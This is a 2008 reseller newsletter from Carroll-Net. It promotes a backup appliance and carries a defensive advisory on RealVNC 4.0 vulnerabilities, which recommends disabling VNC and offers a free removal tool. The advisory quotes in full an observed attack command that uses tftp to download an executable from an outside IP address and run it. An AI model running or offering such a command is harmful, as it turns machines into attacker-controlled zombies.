Healthy Server Reseller News

April, 2008

• Article: "How to reliably backup client servers"
• Free Security Software For Your Clients
• April Special $200 Bonus

Service For Your Customer
http://reseller.carroll.net

How to Reliably Backup Your Client’s Data

What are your clients' doing to protect themselves from data loss? A lot of companies still use tape to do backup, but as you well know, this proposition is riddled with possibility for errors. How can you be sure your clients backup everyday? Or if they test their backups regularly? Unfortunately you can't.

So what are your choices? You could download software and try backups over your client’s Internet.  What you’ll soon realize, is this is only practical for laptops and PCs with small amounts of data  Any attempt to backup a server or anything with a lot of files and this technique just doesn’t work.

The sure-fire solution is to first backup to a local device and then transfer backups  offsite – what's referred to as disk-to-disk-to-datacenter (D2D2DC).  This way backups are done without the interruption to the customer's work.  And backups done this way means  restoring data is fast and simple, with restores being measured in minutes, instead of hours or even days!

D2D2DC technology is embedded in the Carroll-Net Healthy Server Service. Each customer is given their own backup appliance with CncOp technology built-in.  Our patent-pending CncOp technology, performs block-level replication, which means backups are transmitted offsite quickly, and reliably.  And your customers only pay for the storage they use. 

The latest edition of the Carroll-Net Healthy Server automatically stores multiple versions of a customer’s file onsite.  It's simple and effective revisioning for frequently changing files.  The system is setup to allow revisions to automatically use available free space on the Healthy Server at no charge to your customer.

Author: pat@carroll.net
 

Free Security Software For Your Customers

Last month, the US Computer Emergency Readiness Team (US-CERT) announced confirmed vulnerabilities in RealVNC 4.0.  The vulnerabilities would enable a remote attacker to gain complete control over Windows without the need to login.

VNC has become a regular part of an IT professional's toolkit, so this news probably comes as a shock.  Often, US-CERT announcements are treated with a certain amount of skepticism.  But Carroll-Net has witnessed an attack mounted against one of our customers.

In the case we witnessed, the hacker attempted the following action:

%comspec% /c echo Repairing user32.dll &
echo Please wait... & tftp -i 24.110.251.33 GET bin.exe & start bin &

The attack intended to download an executable from the Internet using TFTP, and execute it.  If successful, the attacker would have created a new zombie server for their use.

Carroll-Net strongly recommends you encourage your customers to disable VNC and only enable it when requested by support personnel, and then only for the duration of the support session. While the CERT advisory was specifically for RealVNC, based on the fact all VNC software shares a common codebase, we recommend you encourage customers to disable all versions.

We recognize that many users lack the technical knowledge to correctly and completely disable windows services. To make the process simpler, Carroll-Net has developed a One Click application to correctly and completely disable VNC. You're welcome to distribute the software for free to your customers. 

Just point them to the link http://www.carroll.net/support/StopWinVnc. 

Carroll-Net has released the source code to StopWinVnc. If you're a Carroll-Net reseller and you'd like to receive a copy, click Please send me source.  The source is released under the BSD-License, and is free to modify and distribute.

Author: jim@carroll.com

Goldman Sachs
Networking Index Fund

Jan 1st - April 3rd.
Source: Yahoo